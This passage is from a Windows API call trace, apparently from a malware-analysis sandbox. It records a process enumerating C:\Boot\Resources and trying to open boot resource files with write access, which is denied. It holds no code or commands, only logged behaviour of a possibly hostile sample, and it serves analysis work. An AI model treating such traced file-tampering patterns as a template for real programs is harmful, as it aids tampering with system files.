returned 0x4df50 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.575] AreFileApisANSI () returned 1 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources\\bootres.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources\\bootres.dll", lpUsedDefaultChar=0x0) returned 30 [0070.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.575] AreFileApisANSI () returned 1 [0070.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Resources\\bootres.dll") returned 30 [0070.575] CreateFileW (lpFileName="C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.576] GetFileType (hFile=0x41c) returned 0x1 [0070.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.576] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.576] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.576] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.576] CloseHandle (hObject=0x41c) returned 1 [0070.576] AreFileApisANSI () returned 1 [0070.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Resources\\bootres.dll") returned 30 [0070.577] CreateFileW (lpFileName="C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.577] GetLastError () returned 0x5 [0070.577] GetLastError () returned 0x5 [0070.577] SetLastError (dwErrCode=0x5) [0070.577] GetLastError () returned 0x5 [0070.577] SetLastError (dwErrCode=0x5) [0070.577] GetLastError () returned 0x5 [0070.577] SetLastError (dwErrCode=0x5) [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.577] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0070.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0070.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.578] AreFileApisANSI () returned 1 [0070.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources\\en-US", lpUsedDefaultChar=0x0) returned 24 [0070.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.578] AreFileApisANSI () returned 1 [0070.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x4de70, cchWideChar=24 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US") returned 24 [0070.578] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US" (normalized: "c:\\boot\\resources\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.578] GetLastError () returned 0x5 [0070.578] GetLastError () returned 0x5 [0070.578] SetLastError (dwErrCode=0x5) [0070.578] GetLastError () returned 0x5 [0070.578] SetLastError (dwErrCode=0x5) [0070.578] GetLastError () returned 0x5 [0070.579] SetLastError (dwErrCode=0x5) [0070.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.579] AreFileApisANSI () returned 1 [0070.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0070.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x4dee0, cchWideChar=24 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US") returned 24 [0070.579] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US" (normalized: "c:\\boot\\resources\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.579] GetLastError () returned 0x5 [0070.579] GetLastError () returned 0x5 [0070.579] SetLastError (dwErrCode=0x5) [0070.579] GetLastError () returned 0x5 [0070.579] SetLastError (dwErrCode=0x5) [0070.579] GetLastError () returned 0x5 [0070.579] SetLastError (dwErrCode=0x5) [0070.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0070.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0070.579] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x2e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x78158, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x2e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="")) returned 0 [0070.579] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0070.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.580] FindFirstFileExW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78290 [0070.580] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.580] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0070.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0070.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0070.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.581] AreFileApisANSI () returned 1 [0070.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui", lpUsedDefaultChar=0x0) returned 40 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0070.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.581] AreFileApisANSI () returned 1 [0070.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0070.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0070.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=40 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 40 [0070.582] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.582] GetFileType (hFile=0x41c) returned 0x1 [0070.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0070.582] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.582] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.582] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.582] CloseHandle (hObject=0x41c) returned 1 [0070.582] AreFileApisANSI () returned 1 [0070.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0070.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0070.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6d000, cchWideChar=40 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 40 [0070.583] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.583] GetLastError () returned 0x5 [0070.583] GetLastError () returned 0x5 [0070.583] SetLastError (dwErrCode=0x5) [0070.583] GetLastError () returned 0x5 [0070.583] SetLastError (dwErrCode=0x5) [0070.583] GetLastError () returned 0x5 [0070.583] SetLastError (dwErrCode=0x5) [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0070.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.583] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x4e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x67548, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x4e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="i", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⾠")) returned 0 [0070.583] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0070.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, 